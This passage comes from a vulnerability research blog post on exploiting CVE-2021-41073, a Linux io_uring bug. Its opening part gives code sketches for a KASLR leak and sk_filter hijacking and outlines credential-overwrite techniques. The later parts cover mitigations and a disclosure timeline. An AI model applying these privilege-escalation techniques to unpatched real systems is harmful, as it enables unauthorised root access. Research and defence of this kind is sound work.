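pthread_join(t, NULL);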

io_buffer:

The io_buffer structure is covered at length in the vulnerability section. The field to leak is list, a list_head structure that links the buffer to the rest of the buffers in the buf_group. Leaking this gives the relative position on the slab, so the addresses of the objects sprayed can be calculated. I later realized this object could also be used to build an arbitrary free primitive, by modifying the list members and unregistering multiple buffers. This is just a thought; that technique wasn’t used in this exploit.

seq_operations:

A seq_operations structure is allocated when a process opens a seq_file. This structure stores the pointers to functions that perform sequential operations on the file. By opening /proc/cmdline, this structure will be allocated. Leaking this object gives pointers to several functions. In particular, I use the function single_next to break KASLR.
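A sketch of the KASLR break, where the struct offset and SINGLE_NEXT_OFFSET (single_next’s offset in the kernel image) are assumptions that must be taken from the target build:

/* each open of a seq_file allocates a seq_operations in kmalloc-32 */
int fd = open("/proc/cmdline", O_RDONLY);

/* ... free the setxattr buffer with the bug, let the seq_operations
   reallocate it, then read the contents back with getxattr ... */
getxattr("lol.txt", "user.lol", leakbuf, 32);

/* ->next is the third function pointer; single_next for single_open files */
uint64_t single_next = *(uint64_t *)(leakbuf + 16);
uint64_t kaslr_slide = single_next - SINGLE_NEXT_OFFSET;  /* offset: assumption */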

Object for Overwriting:

sk_filter:

An sk_filter structure is allocated when an already loaded eBPF program is attached to a socket. Of particular interest is the field prog, which contains a pointer to a bpf_prog structure that represents the attached eBPF program. By overwriting this pointer, we gain kernel execution. One thing to note: because prog is the last field in sk_filter, it is not covered in the n-8 bytes we can write to using the mentioned techniques. However, this is easily fixable. Instead of blocking in setxattr, we call getxattr immediately after and block. The setxattr kernel buffer will be reallocated in getxattr, and will be completely overwritten with the desired contents before blocking in copy_to_user.
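Allocating the target is straightforward (sketch; prog_fd is assumed to be an eBPF program previously loaded with bpf(BPF_PROG_LOAD, ...)):

/* attaching a loaded eBPF program to a socket allocates the sk_filter */
int sv[2];
socketpair(AF_UNIX, SOCK_DGRAM, 0, sv);
setsockopt(sv[0], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd));

/* later, once prog points at the fake bpf_prog, this runs it in the kernel */
write(sv[1], "x", 1);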

Putting It all Together

As stated above, we gain execution by overwriting the prog pointer in an sk_filter. A bpf_prog structure has a field bpf_func, which contains a pointer to the function that gets called when the associated socket has data written to it. When the function is called, the second parameter contains a pointer to the bpf_prog field insns, an array of BPF instructions used by the eBPF interpreter.

At this point, there are a few options:

One option: put bpf_prog_run in the bpf_func field - this is the function that decodes and executes BPF instructions when a program is not JIT compiled - and place eBPF bytecode instructions that overwrite creds in the insns array. This works even if eBPF JIT is configured. However, if the Kconfig CONFIG_BPF_JIT_ALWAYS_ON is set, the interpreter is not compiled into the kernel.

Another option is to look for ROP gadgets in the kernel to call instead. This idea was inspired by Alexander Popov’s original exploit for CVE-2021-26708 [26].

We need a gadget that:

  1. Dereferences the insns pointer, where we place the pointer &task_struct->cred
  2. Writes 0 to the uid offset
  3. Writes 0 to the euid offset
  4. Returns

It’s possible to derive the exit value of an eBPF program, so we can first leak the address of task->cred and then repeat the process with the uid and euid overwrites. With a leak, the operations can be split across two ROP gadgets. This gives some flexibility on what gadgets can be used, and increases the likelihood of the kernel containing the necessary gadgets.

Last but not least, we have another option: JIT smuggling. This term, coined by Amy Burnett for browser exploitation, refers to tricking a JIT compiler into creating ROP gadgets for use in an exploit. The same technique can be used for the eBPF JIT compiler. Instead of leaking the address of single_next, leak the address of our original bpf_prog. We can use our original JIT compiled eBPF program to smuggle the ROP gadgets we need. Since the program is on an executable page, we can call into any portion of it. After calculating the offset of the program where the needed ROP gadget lies, write the address in the bpf_func field.

There are many other ways to exploit this bug. I came up with a few more ideas while writing this blog post. Can you think of any more?

Demo

Find the proof-of-concept (PoC) exploit code along with a test VM here.

Mitigations

The io_uring subsystem introduces a large and rapidly growing kernel code base that is reachable as an unprivileged user. It’s a system call interface, so it is inherently hard to sandbox; we depend on system call filtering, e.g. seccomp and SELinux, for sandboxing. io_uring redefines how user space interacts with the kernel, and is accessible to unprivileged users on kernels 5.1 and above, which includes a growing number of Android devices. Additionally, you need to enable CONFIG_EXPERT in the kernel to even have the option to disable it. For these reasons, I believe io_uring is going to have an important impact on the future of Linux security.

I’ll present mitigations that offer some protection against the exploit techniques I’ve outlined in this post, and discuss their effectiveness. I’ll also present some considerations for the future of Linux kernel hardening.

Existing Mitigations

First I’ll cover the mitigations for which I’ve already discussed bypasses:

CONFIG_SLAB_FREELIST_RANDOM randomizes the order in which buffers get added to the freelist when a new slab page is allocated. This mitigation is helpful for heap overflow bugs that may depend on contiguous object allocation to be exploitable. However, I don’t believe it is particularly effective for UAF or vulnerabilities giving a controllable free. As Jann Horn notes in this Linux kernel exploitation writeup, if you can control the order of what gets freed, then you can control the freelist, and the randomization is nullified [27]. There is a low performance cost to this mitigation, as the randomization only occurs when a new slab page is allocated.

CONFIG_BPF_JIT_ALWAYS_ON removes the eBPF interpreter from the kernel. The intent of this mitigation is to reduce the number of usable exploitation gadgets. While I’ve discussed a number of bypasses in the context of this exploit, it should always be set if eBPF JIT is enabled. As a mitigation, it comes at no cost performance wise and removes a potential primitive for attackers.

Some additional suggestions:

CONFIG_BPF_UNPRIV_DEFAULT_OFF turns off eBPF for unprivileged users by default. This can be modified via a sysctl knob while the system is running. Whether this mitigation is appropriate will depend on whether your system needs to let unprivileged users run eBPF programs. If not, turning off eBPF for unprivileged users reduces attack surface in terms of exploiting eBPF itself, as well as making eBPF unavailable to use as a primitive, as shown in this exploit. While this mitigation won’t directly affect the exploitability of this vulnerability, it does block a very useful primitive. This will force an attacker to be more creative and come up with another way to gain kernel execution or read/write abilities.

CONFIG_SLAB_FREELIST_HARDENED checks whether a free object’s metadata is valid. This mitigation will not protect against any of the techniques shown in this writeup, but it blocks other primitives that can be built with the vulnerability. For example, if a kernel buffer is blocking on a user copy and is then freed, the freelist metadata can be overwritten after the copy is unblocked, giving an attacker control over the pointer to the next free object. This type of freelist control primitive is blocked by this mitigation, which checks whether the free object is actually within a valid slab page before allowing it to be allocated. There are some minor performance costs that come with performing a check for every freed object.

Future Considerations

Implementing control flow integrity for eBPF programs would block several of the techniques discussed in this post. When an eBPF program is verified and JIT compiled, the official entry point can be added to a list of valid targets that is checked before a program is run. This would block the previously discussed general ROP technique, the JIT smuggling technique, as well as the interpreter technique (if JIT is turned on).

The next consideration, while not a mitigation, is a simple but fundamental measure to improve software security. The vulnerability exploited in this post would easily have been found if basic unit tests had been written for the IORING_OP_PROVIDE_BUFFERS feature. It was only after the second exploitable vulnerability in this feature was reported that any tests were committed [32]. Because of the rapid growth in both system call support and features of io_uring in the upstream kernel, it is important to provide accompanying tests so that easily findable vulnerabilities like this one don’t slip by.

Security Disclosure Timeline

9/8/2021: I find the vulnerability. I write a PoC to make sure my assumptions are correct.

9/11/2021: I disclose the vulnerability to security@kernel.org and share the PoC.

9/11/2021:  Report is forwarded to io_uring developers and acknowledged.

9/11/2021:  A potential patch is provided.

9/12/2021: I review and test the patch. I confirm it fixes the issue. Jens asks me what email I want to use for my Reported-by tag. I respond with my work email, but he is apprehensive because the domain name makes it obvious the patch fixes a security issue. I give my personal email instead, which he accepts.

9/13/2021: Greg K-H responds to my initial report, which stated that I wanted to coordinate disclosure with the linux-distros mailing list so downstream consumers could apply the patch. He says that since most distros sync on stable releases, it is not necessary to get the distro list involved. I don’t get the distro list involved.

9/13/2021: I apply for a CVE via Mitre. CVE-2021-41073 is reserved.

9/18/2021: The patch hits upstream and is backported to affected versions. I send out a disclosure via the oss-security mailing list.

Reflection on the Linux Kernel and Security Fixes

First, I was impressed with the short time it took to go from initial report to pushed fix. It’s no secret that the Linux kernel community can be somewhat caustic to newcomers, but everyone I interacted with was (mostly) cordial.

The reporting process, however, is confusing. The official guide is out of date and inconsistent, and it seems that everyone who has reported kernel vulnerabilities does so a bit differently. For the most part, people email the linux-distros mailing list, and sometimes a CVE ID is reserved that way. In my case, though, I did not contact the linux-distros list because Greg said it wasn’t necessary. Submitting patches is also done via mailing list (so, sent via email). The whole process is hard to understand compared to modern ways of issue tracking. This recent blog post contains the relevant information that I wish I had available at the time [29].

Another thing that I noticed is the general culture around security fixes in the Linux kernel. While this is nothing new, I was surprised to see how it permeates to a microscopic level [30]. Small things such as modifying “Reported by” tags because the email has “security” in the domain name, or removing a CVE identifier from a commit message seem to be a common occurrence [31]. What is the benefit gained by obfuscating a security issue, in particular, one that already has an assigned CVE?

Exploitable vulnerabilities are patched in the upstream kernel all the time without a CVE, or even an honest commit message identifying them as security bugs. The consequences of this are undeniable: it has prevented patches for exploitable vulnerabilities from being backported, and these vulnerabilities were later exploited in the wild [28]. Attackers are capable of looking through commits to find these hidden vulnerabilities, and they’re incentivized to do so. Defenders shouldn’t be burdened with this as well.

I believe that for Linux kernel security to improve, an updated, straightforward guide on the appropriate way to disclose a vulnerability should be agreed upon and released. Additionally, transparency on what patches address security issues will help prevent downstream consumers from shipping vulnerable software.

Conclusion

At Grapl, security is truly our highest priority. Offensive security research is a critical driver for how we develop our product. With this work, we’ve taken active measures to harden our production environment in the following ways:

  1. Identify where we need to enforce boundaries. We don’t rely on the vanilla Linux kernel to enforce security boundaries around sensitive code; we take significant measures to limit kernel attack surface and use VMs managed by a restricted Firecracker process for isolation. This allows us to significantly reduce our trust in the kernel.
  2. Continue to track and investigate areas of the kernel that are prime attack surface, as we’ve done here.
  3. Audit our operating system images to ensure that we are leveraging all possible mitigations against techniques, like those described here.

Acknowledgements

Vitaly Nikolenko, for outstanding Linux kernel exploitation research. I used his universal heap spray technique in my exploit and as a basis for my universal heap leak technique.

Jann Horn, for outstanding Linux kernel exploitation research. I used his research on schedulers as well as FUSE blocking in my exploit.

Alexander Popov, for outstanding Linux kernel exploitation research. I used his research as a guide on how to construct this exploit.

Andréa, for her incredible work creating the diagrams in this post.

Ryota Shiga, for his excellent post on exploiting io_uring. This post helped me understand io_uring internals when getting started.

netspooky, for the blog post title, edits, and general moral support.

Grapl and the Grapl team, for supporting this research.

References

  1. https://blogs.oracle.com/linux/post/an-introduction-to-the-io-uring-asynchronous-io-framework
  2. https://twitter.com/axboe/status/1483790445532512260
  3. https://wjwh.eu/posts/2021-10-01-no-syscall-server-iouring.html
  4. https://unixism.net/loti/what_is_io_uring.html
  5. https://lwn.net/Articles/810414/
  6. https://kernel.dk/io_uring.pdf
  7. https://unixism.net/loti/tutorial/sq_poll.html
  8. https://unixism.net/loti/async_intro.html
  9. https://www.theregister.com/2021/06/22/spectre_linux_performance_test_analysis/
  10. https://github.com/axboe/liburing
  11. https://windows-internals.com/ioring-vs-io_uring-a-comparison-of-windows-and-linux-implementations/
  12. https://manpages.debian.org/unstable/liburing-dev/io_uring_setup.2.en.html
  13. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41073
  14. https://lwn.net/Articles/813311/
  15. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3491
  16. https://www.zdnet.com/article/which-are-the-most-insecure-programming-languages/
  17. https://googleprojectzero.blogspot.com/2019/01/taking-page-from-kernels-book-tlb-issue.html
  18. https://www.spinics.net/lists/io-uring/msg09009.html
  19. https://duasynt.com/blog/linux-kernel-heap-spray
  20. https://argp.github.io/2012/01/03/linux-kernel-heap-exploitation/
  21. https://ruffell.nz/programming/writeups/2019/02/15/looking-at-kmalloc-and-the-slub-memory-allocator.html
  22. https://events.static.linuxfound.org/images/stories/pdf/klf2012_kim.pdf
  23. https://hammertux.github.io/slab-allocator
  24. https://twitter.com/tehjh/status/1438330352075001856
  25. https://ruia-ruia.github.io/NFC-UAF/
  26. https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html
  27. https://googleprojectzero.blogspot.com/2021/10/how-simple-linux-kernel-memory.html
  28. https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2021/CVE-2021-1048.html
  29. https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-vulnerabilities/#including-a-patch
  30. https://www.cnet.com/tech/tech-industry/torvalds-attacks-it-industry-security-circus-1/
  31. https://twitter.com/grsecurity/status/1486795432202276864
  32. https://github.com/axboe/liburing/commit/d06c81aa3c170b586b09a88ebcd2c04f3106bd44

Interested in our product? Check out our Github. Reach out for a demo!

Connect with us on the Discord and Slack - we'd love to answer any questions you may have about our product.